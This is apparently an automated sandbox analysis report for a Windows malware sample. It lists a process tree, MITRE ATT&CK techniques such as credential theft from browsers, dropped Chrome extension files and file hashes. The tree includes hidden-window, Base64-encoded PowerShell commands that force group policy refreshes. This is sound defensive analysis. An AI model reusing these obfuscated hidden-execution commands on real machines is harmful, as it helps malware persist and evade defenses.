- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1372 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1140
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2428 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:2220
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:588 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:2000
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1692
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:524
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1956
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Impair Defenses
2Disable or Modify Tools
2Indirect Command Execution
1Modify Registry
2Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD53a69d116428b6aa2d20fb19d8fb2a50d
SHA10d93900ad02ce0d15c2d29e0f0c0d9878bdcb653
SHA2568f4f50929a5338a4f350b754146a2d5d88c63520e8f0cba982f18e654a794964
SHA5127be2aa547e47f3bbfaa8f23e0023e6bbe755ee975dfb57be8eced16c2537f4595eb336a55bfc9280b18461347f1f3bbefaaa3cbc81f9653f9ecd0de160cdfb67
-
Filesize
2KB
MD5d89ca36ceb5ca717fc6b1c89f21419a7
SHA176623cfb48005c5782429684e9c94bd4b256fb5a
SHA2565f3b31620f7f2f2c420c6e8cbf5bcdbe76cf4b6f6424a4e56ca7685d3a3f9542
SHA5121dbb06b7ed6248cef51d06f7bd4c9655c64dd96b678a8a0722546e877a7c7c5f616e7caf6b1b9bcf13ed60a12c4448c071d3a0278d68320bc98129a9185384a3
-
Filesize
2KB
MD5ca446e2120ab76c28ea3718f3bccbaf2
SHA125d071bda110c73afef80ffed2dc339d4979cdc7
SHA2566ebd3e54701a8251594408563ab02554f3589d73e3f381864f37e54c4dea815c
SHA51278d67502017124ad48e8216ceef6eb9b6ab8142bd93bbab0467dffccd7786b1598156b38300ef29b02bb132aca0585af3788728fc7cded531e3337016ce01a36
-
Filesize
2KB
MD5b9753488a2ea1237fcf075ecc1b060bd
SHA12e1cf3eddc113b10b928c0b03df94101958539df
SHA256c4634e712d03c5da1559027eda58132f04d0e00f1b2ae6b151648622d7df0705
SHA512cfdfe57d24a232f2ef2540d723202841e36fbff802648ee33ca006a92d741e9831ff9ec92b3176684c9922ec1e71ce093066d8c4d1169fc9544e161391f5396e
-
Filesize
644KB
MD59b5a3d10abb187b9de96650328194b9c
SHA13980d277fd56776a3cdc81133ca61da9af04f4ad
SHA25624b42fae4c6cf9b6a6a4d05676b04ea68b4f34745e8163ac7ef0b8dd5e88fca2
SHA5126d7f04dae8ddfb51c305dfc9097305b92633fef05aebcdddd296d3804c4b58bf573312a5768b09fe08f78c9b0a224500b219a43710ebf6cc3db46c901440ad1a
-
Filesize
2KB
MD51601000c19b7091262a8ff80b7e8450d
SHA15ea9ef1b72b426c883c66441b49dde99e6692fe4
SHA25622183f59047655b11215a37550439f53f53952f6b408b7728e401b7910ff5d45
SHA51275e9c4a3abd696b88638d2208dbcc4855931b781295d7b88cad341db1c448a462cebc483747d801ff002f2b3da1f6361897f9c026d16901876a39c942f0b0e2b
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\fakaldmaepeakkcjljcakjphgknbbbmp\1.1_0\_locales\en\messages.json
Filesize150B
MD533292c7c04ba45e9630bb3d6c5cabf74
SHA13482eb8038f429ad76340d3b0d6eea6db74e31bd
SHA2569bb88ea0dcd22868737f42a3adbda7bf773b1ea07ee9f4c33d7a32ee1d902249
SHA5122439a27828d05bddec6d9c1ec0e23fc9ebb3df75669b90dbe0f46ca05d996f857e6fbc7c895401fecfae32af59a7d4680f83edca26f8f51ca6c00ef76e591754
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\fakaldmaepeakkcjljcakjphgknbbbmp\1.1_0\_locales\pt_BR\messages.json
Filesize161B
MD55c5a1426ff0c1128c1c6b8bc20ca29ac
SHA10e3540b647b488225c9967ff97afc66319102ccd
SHA2565e206dd2dad597ac1d7fe5a94ff8a1a75f189d1fe41c8144df44e3093a46b839
SHA5121f61809a42b7f34a3c7d40b28aa4b4979ae94b52211b8f08362c54bbb64752fa1b9cc0c6d69e7dab7e5c49200fb253f0cff59a64d98b23c0b24d7e024cee43c4
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\2N8QFW35J4BUDKHXVF97.temp
Filesize7KB
MD539bbb96e609b9c73be35b0853346695a
SHA1e1113a7f3a1b5543fe127d37c14872590cf50cd6
SHA256246d5dd59792fba627a536b3984833ea4f43f4ab0344af3e0109155dda566ae1
SHA512b51420904fe1901dbd53c60563bdf47f71d8abbddb840040d3eaaab6c352d9e105046d6fff82232b3251979265b887306c1461a081d073a3b3ee0ddc86a09757
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD540bb53a688be37c43996bc63f4f560cf
SHA19985906200ac8ebc7a1435ef9e9de831f97c8778
SHA2566162e1b75733313e36fb0b3cf573f0cdd874f6565a0df67d8c25af446fc7af30
SHA512092b76033b5efd29de2009fc6a3d359db750a47d982315d431b1ce8c3f28eeb54a6d137be8fe46cbf1b1908e8e2e0f10daef4def8e8f7c923cc1e90037457be7
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD53a33d6474cad3d71299f1c35a7cbe6b1
SHA1ca79b05d4017b1e2993e6aa276cd16ad428e4111
SHA256686fec1c8e004fc91e1e66dff9fefb2adec418c145f41c2a8c39c8a78a8efd4c
SHA512bfc10f91d13a2f76c01eddd3bb49274ec8f5478db0bfeef338fb7672aab33312421dfb4fb4caed785128378574104970e995e89d5cc000816556716a6d63d164
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD5e57b1436677766558440b602ae2b5f71
SHA13a2f0f892f54053663c581c2ac49316ac89fdbbb
SHA256db3f011dc39fb57247cab3870cdb1fd39df11234318bcabfa1b1d3debad019ce
SHA5127a31c3a35043b700442ddef91d0575d41e325b4e4acf6282d3b31d252097eee97aa1f0350f6a3b763052bb2655057e470de405cd9f245ee5ce7b66e4877e4531
-
Filesize
6KB
MD5829978917152bb5ebafa2fa146932218
SHA1341c01313c8f364ed4a239b5216bdf55819b7b97
SHA2565b99fdd91784191b59836188362ce6619eabf0f280e4dd88dcbdd789aeb54780
SHA51268419b30149f4c6a775881215adfe496fff429b7b3a85be6b650302a197eeb5a7fea3dfe5e4f9024dcd5fdf5b59c96a558ce1ebe02eb88dc23a0d0d59f26f7d8
-
Filesize
9KB
MD5c69e98385d152336cd2c16919a19570e
SHA17892a5c2c2a27b77bd674dd44927950711b34b4c
SHA256acb9b5e0a26df1adc313980ead66c5ca9e945f34b1a7f286cf1db07dad1a61d0
SHA512c8bbdb1304ddbb78c4047c8c342c86581d9d7a2ce8700e3c17bbf41579905cba46da0e9a9b6d81abb047399a4a887daf011035c4fb6388a27ff8863450d09ee1